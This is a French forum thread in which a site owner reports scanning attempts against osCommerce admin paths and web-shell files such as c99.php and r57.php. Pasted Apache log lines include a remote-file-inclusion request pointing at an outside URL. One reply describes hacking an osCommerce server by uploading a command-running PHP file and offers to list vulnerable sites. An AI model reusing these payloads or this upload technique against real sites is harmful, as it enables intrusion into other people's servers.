Bonsoir

J'ai eu des tentatives de hacking de "83.143.19.240" ce soir, près de 400 essais infructueux, générant autant d'erreurs 404
J'en ai averti son hébergeur (CTN1) pour éviter des suites .. la traceroute ne mêne pas plus loin

Je n'héberge pas d'oscommerce mais je trouve cela assez préjudiciable et énervant que des gosses s'amusent à rechercher des failles de sécurité partout où elles ne sont pas ( du moins j'en suis convaincu )

Votre expérience ? Mauvais présage ou juste un petit vent ?

type de fichiers :
oscommerce1/admin/c1000.php
onlineshop/admin/c100.php
shop/admin/export.php
shop1/admin/r57.php
catalog/admin/c99.php
catalog1/admin/shell.php

J'en conclus qu'il s'agit de failles générales ces fichiers
une petite recherche google amène rapidement à des backdoors trojan directement détectés par norton, sur page php mise en cache, joli

 
 
non, franchement, les logs apache, on en a tous des kilometres, et on meurt pas.  

Ok, ça commence comme ça :
83.143.19.240 - - [13/Nov/2007:22:20:56 +0100] "GET /include.php?path=misc/finduser.php HTTP/1.1" 301 5 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:20:56 +0100] "GET /catalog/admin/index.php HTTP/1.1" 404 72 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:20:57 +0100] "GET /shop/admin/index.php HTTP/1.1" 404 72 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:21:16 +0100] "GET /html/phpkit/include.php?path=misc/finduser.php HTTP/1.1" 301 5 portail-patrimoine.com "-" "Mozilla/5.0" "-"
83.143.19.240 - - [13/Nov/2007:22:21:32 +0100] "GET /rss.php?sitemap=http://www.power-racing-online.de/pro/pro/content/images/conf? HTTP/1.1" 200 47895 portail-patrimoine.com "-" "Mozilla/5.0" "-"

Pour avoir travailler sur OSCommerce. Cette application n'est pas du tout sécurisé. Donc il est normal que certain font des attaques massif sur cette application. Donc il faut pas s'étonner de cela.

Perso j'ai toujours préféré créer des application personnelles ces tentatives m'ont bien fait rire

En effet, c'est un risque d'avoir une application populaire sans le mettre à l'epreuve. PhpBb en est l'exemple parfait.  
Personnellement, j'ai réussi à hacker une machine avec oscommerce. Il y a un module permettant d'uploader n'importe quel fichier. Donc j'ai pu uploader un fichier php avec un simple script permettant d'executer n'importe quel code php via la commande system.

Sympa comme faille, je donne la liste de sites fait via OsCommerce et phpBB directement ?

Non mais n'importe quoi...